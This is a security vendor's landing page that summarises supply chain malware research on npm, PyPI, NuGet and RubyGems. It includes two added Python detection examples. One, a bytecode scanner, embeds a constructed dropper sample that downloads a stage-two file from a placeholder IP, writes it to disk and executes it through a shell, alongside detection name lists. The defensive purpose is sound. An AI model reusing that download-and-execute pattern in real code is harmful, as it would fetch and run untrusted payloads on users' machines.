Spectra Assure Community
Find the best building blocks for your next app.
Secure Open Source
Building secure software requires the best of Open Source.
Spectra Assure Community allows you to review the key aspects of software safety before including your next dependency.
Share Assessment Reports
Customers demand software transparency.
Go beyond sharing a simple SBOM. Demonstrate your commitment to building secure software. Share assessments, raise concerns, and triage issues together with your users. Cut the noise and prioritize what matters.
Secure Dev Toolchains
Building secure software relies on trustworthy development toolchains.
Spectra Assure Community allows you to trust the compilers, linkers, IDE plugins and CI/CD pipelines that you use to build apps.
Complete Approach to Secure Software Supply Chains
Malicious attacks on public open source repositories are now as pervasive as developers' use of open source dependencies. Spectra Assure Community monitors open source packages to identify malware, code tampering and indicators of software supply chain attacks.
Quick guided tour
Learn how our reports help you make the best choices for keeping your credentials, projects and end users safe from malicious attacks.
Malicious NuGet campaign uses homoglyphs and IL weaving to fool devs
Jul 11, 2024
Malicious NuGet packages found impersonating legit packages using homoglyphs and injecting malicious functionality using IL weaving.
Malicious npm packages target AWS users
Jun 26, 2024
A dormant package turned malicious only after a few months; the actor was trying to pass the malicious package off as a legitimate one.
Malicious package with wiper functionality detected in PyPI
Jun 5, 2024
Malicious packages published as part of irresponsible red team activity present a threat to incautious developers and generate noise for security researchers.
Suspicious NuGet package grabs data from industrial systems
Mar 26, 2024
A suspicious package that demonstrates how thin the line between industrial espionage and unconventional feature implementation can be.
BIPClip: Malicious packages target crypto wallet recovery passwords
Mar 12, 2024
Malware authors try to fool developers looking to implement Bitcoin Improvement Proposal 39 (BIP39) in order to steal the mnemonic phrases used to recover lost or destroyed crypto wallets. The campaign lasted for more than a year, with the first malicious package dating back to December 2022.
Attackers leverage PyPI to sideload malicious DLLs
Feb 20, 2024
Two PyPI packages observed using DLL sideloading to execute code without attracting the attention of security monitoring tools. The attack was carried out by loading malicious code located in an unsigned (and therefore untrusted) DLL from the context of a signed PE executable.
GitHub leveraged to store stolen data
Jan 23, 2024
GitHub is increasingly being used to easily deploy malicious open source software. One novel way is using GitHub to store stolen sensitive data.
Malware leveraging public infrastructure on the rise
Dec 19, 2023
Malware authors occasionally upload their samples to services like Dropbox and Discord to host second stage malware. This time around, GitHub was being abused to issue commands to PyPI malware.
Protestware taps npm to call out wars
Nov 16, 2023
Newly discovered open source software packages on the npm platform contain scripts that broadcast peace messages related to ongoing conflicts in Ukraine and on the Gaza Strip when they are deployed.
IAmReboot: Malicious NuGet packages exploit loophole in MSBuild integrations
Oct 31, 2023
These packages show how threat actors have moved from simple downloaders executing inside install scripts to a more refined approach that exploits NuGet’s MSBuild integrations feature to trigger execution of malicious functionality.
Malicious npm package delivering r77 rootkit
Oct 4, 2023
The letter “s” was all that separated a legitimate npm package from a malicious twin that delivered the open source r77 rootkit — this typosquatting package was downloaded more than 700 times.
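The two name-based tricks in the posts above (look-alike Unicode characters in NuGet package names, and a single added letter in an npm package name) can both be caught before a dependency is installed by comparing a candidate name against a list of packages you already trust. The following is an added example, not code from Spectra Assure Community or from the posts; the package names and the confusables table are constructed for illustration (a real check would use the full Unicode UTS #39 confusables data):

```python
"""Flag package names that impersonate trusted ones via homoglyphs or one-edit typos.
Added illustration; names and the confusables table below are constructed samples."""
import unicodedata
from typing import List, Optional, Tuple

# Constructed subset of Cyrillic/Latin look-alikes (assumption: a real scanner
# loads the complete Unicode confusables table instead of this short dict).
CONFUSABLES = {
    "\u0430": "a",  # Cyrillic small a
    "\u0435": "e",  # Cyrillic small ie
    "\u043e": "o",  # Cyrillic small o
    "\u0440": "p",  # Cyrillic small er
    "\u0441": "c",  # Cyrillic small es
    "\u0443": "y",  # Cyrillic small u
    "\u0445": "x",  # Cyrillic small ha
    "\u0456": "i",  # Cyrillic small byelorussian-ukrainian i
    "\u0455": "s",  # Cyrillic small dze
    "\u0131": "i",  # Latin dotless i
    "\u0142": "l",  # Latin l with stroke
}

def skeleton(name: str) -> str:
    """Reduce a name to an ASCII skeleton: NFKC normalize, lower-case,
    swap known confusables for their Latin twin, drop combining accents."""
    out = []
    for ch in unicodedata.normalize("NFKC", name).lower():
        ch = CONFUSABLES.get(ch, ch)
        for base in unicodedata.normalize("NFD", ch):
            if unicodedata.category(base) != "Mn":  # skip combining marks
                out.append(base)
    return "".join(out)

def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance with unit cost for insert, delete and substitute."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def classify(candidate: str, trusted: List[str]) -> Tuple[str, Optional[str]]:
    """Return (verdict, trusted_name_matched).

    exact      candidate is itself a trusted name
    homoglyph  same skeleton as a trusted name but different code points
    typosquat  skeleton within one edit of a trusted name (e.g. one added letter)
    ok         no resemblance found
    """
    if candidate in trusted:
        return "exact", candidate
    cand_sk = skeleton(candidate)
    for t in trusted:
        if cand_sk == skeleton(t):
            return "homoglyph", t
    for t in trusted:
        if edit_distance(cand_sk, skeleton(t)) == 1:
            return "typosquat", t
    return "ok", None

if __name__ == "__main__":
    trusted = ["lodash", "express"]                 # constructed allow-list
    for name in ["lodash", "l\u043edash", "lodashs", "requests"]:
        print(repr(name), "->", classify(name, trusted))
```

Run the skeleton comparison before the edit-distance pass: a homoglyph twin has distance 0 once normalized, so checking raw strings with Levenshtein alone would miss it, while a name that is one letter longer than a trusted one (the r77 case above) only shows up in the distance check.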
VMConnect supply chain attack linked to North Korean threat actors
Aug 31, 2023
PyPI was leveraged to target developers in the first software supply chain attack attributed to state-sponsored threat actors. The malicious packages mimicked popular open source Python tools to trick developers into installing them.
Fake Roblox packages target npm with Luna Grabber
Aug 22, 2023
Attackers are increasingly using open source malware in their attacks on developers. As in the 2021 campaign, fake Roblox packages mimicking the legitimate noblox.js package delivered the open source infostealer Luna Grabber.
Brainleeches - First crossover of phishing and supply chain attacks
Jul 6, 2023
“Write once, infect everywhere” might be the new cybercrime motto, with newly discovered campaigns showing malicious npm packages powering phishing kits and supply chain attacks.
Who checks the contents of compiled Python files?
Jun 1, 2023
In the ever-evolving pursuit of detection evasion, attackers are starting to take advantage of the fact that Python byte code (PYC) files can be executed directly, without any accompanying source.
RATs found hiding in the npm attic
May 18, 2023
A combination of suspicious code behaviors draws attention for deeper investigation. Open source packages that contain hard-coded IP addresses in their code, while also executing commands and writing data to files, in our experience usually turn out to be malicious.
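The two posts above fit together: a scanner that only reads `.py` files misses a payload shipped as a `.pyc`, and the behaviour combination described (hard-coded IP address, command execution, file writes) can be recovered from the compiled bytecode without running it. The following is an added example, not code from Spectra Assure Community or from the posts; the sample module, the TEST-NET-2 address and the name lists are constructed for illustration:

```python
"""Compile a constructed sample to .pyc, then inspect the bytecode (never run it)
for hard-coded IPv4 literals, command execution and file-write names.
Added illustration; SAMPLE_SRC, BENIGN_SRC and the name sets are constructed."""
import marshal, os, py_compile, re, tempfile, types
from typing import Dict, Set

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed, deliberately short name sets; a real scanner would use a larger,
# tuned list and weigh names by context to keep false positives down.
EXEC_NAMES = {"system", "popen", "Popen", "check_output", "exec", "eval"}
WRITE_NAMES = {"write", "open", "urlretrieve"}

# Constructed dropper-like sample: 198.51.100.0/24 is reserved documentation space.
SAMPLE_SRC = '''
import os, subprocess, urllib.request
C2 = "http://198.51.100.23/stage2"
def main():
    data = urllib.request.urlopen(C2).read()
    with open(os.path.expanduser("~/.cache/upd.bin"), "wb") as f:
        f.write(data)
    subprocess.Popen(["sh", "-c", "~/.cache/upd.bin"])
'''

# Constructed benign sample: writes/reads files but has no IP and no exec.
BENIGN_SRC = '''
import json
def load(path):
    with open(path) as f:
        return json.load(f)
'''

def walk_code(code: types.CodeType):
    """Yield a code object and every nested one (functions, lambdas, comprehensions)."""
    yield code
    for const in code.co_consts:
        if isinstance(const, types.CodeType):
            yield from walk_code(const)

def load_pyc(path: str) -> types.CodeType:
    """Read a .pyc without executing it: skip the 16-byte header
    (magic, flags, source mtime or hash, source size) and unmarshal the code."""
    with open(path, "rb") as f:
        f.read(16)
        return marshal.load(f)

def analyse(code: types.CodeType) -> Dict[str, object]:
    """Static pass: IPv4 literals from string constants, referenced names from co_names."""
    ips: Set[str] = set()
    names: Set[str] = set()
    for co in walk_code(code):
        names.update(co.co_names)           # globals, attributes, imports
        for c in co.co_consts:
            if isinstance(c, str):
                ips.update(IPV4.findall(c))
    execs = sorted(names & EXEC_NAMES)
    writes = sorted(names & WRITE_NAMES)
    return {
        "ips": sorted(ips),
        "exec": execs,
        "write": writes,
        # The heuristic from the post: all three together is what usually turns out malicious.
        "suspicious": bool(ips and execs and writes),
    }

def scan_source(src: str) -> Dict[str, object]:
    """Compile source to a .pyc in a temp dir and analyse only the compiled file,
    the way a scanner must treat a package that ships bytecode without source."""
    with tempfile.TemporaryDirectory() as d:
        py, pyc = os.path.join(d, "mod.py"), os.path.join(d, "mod.pyc")
        with open(py, "w") as f:
            f.write(src)
        py_compile.compile(py, cfile=pyc, doraise=True)
        return analyse(load_pyc(pyc))

if __name__ == "__main__":
    print("sample:", scan_source(SAMPLE_SRC))
    print("benign:", scan_source(BENIGN_SRC))
```

Two caveats for real use: `marshal.load` is not hardened against malformed input, so run the scan on untrusted `.pyc` files in an isolated worker; and the 16-byte header layout assumes CPython 3.7 or later, while the magic number in the first four bytes tells you which interpreter version produced the file and therefore which `dis` to read it with.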
Malicious npm package mimics Material Tailwind CSS tool
Sep 23, 2022
The malicious Material Tailwind npm package has an automatic post-install script that downloads a password-protected zip file containing a malicious executable: a custom-packed Windows executable capable of running PowerShell scripts.
IconBurst - Escalation of Attacker Tactics
Jul 5, 2022
IconBurst is the first typosquatting attack to trigger the payload only after its host software release package is deployed by unsuspecting users.
Malware Targeting Developer's Credentials
Jul 21, 2021
Typosquatting attacks prey on developers mistyping open source package names. The malicious payload usually steals credentials to pivot through developer toolchains.
Mining for malicious Ruby gems
Apr 16, 2020
“Jim Carrey” and “Peter Gibbons” impersonators join in a barrage of typosquatting malware on RubyGems targeting software repository users. The malicious code was designed to redirect cryptocurrency transactions.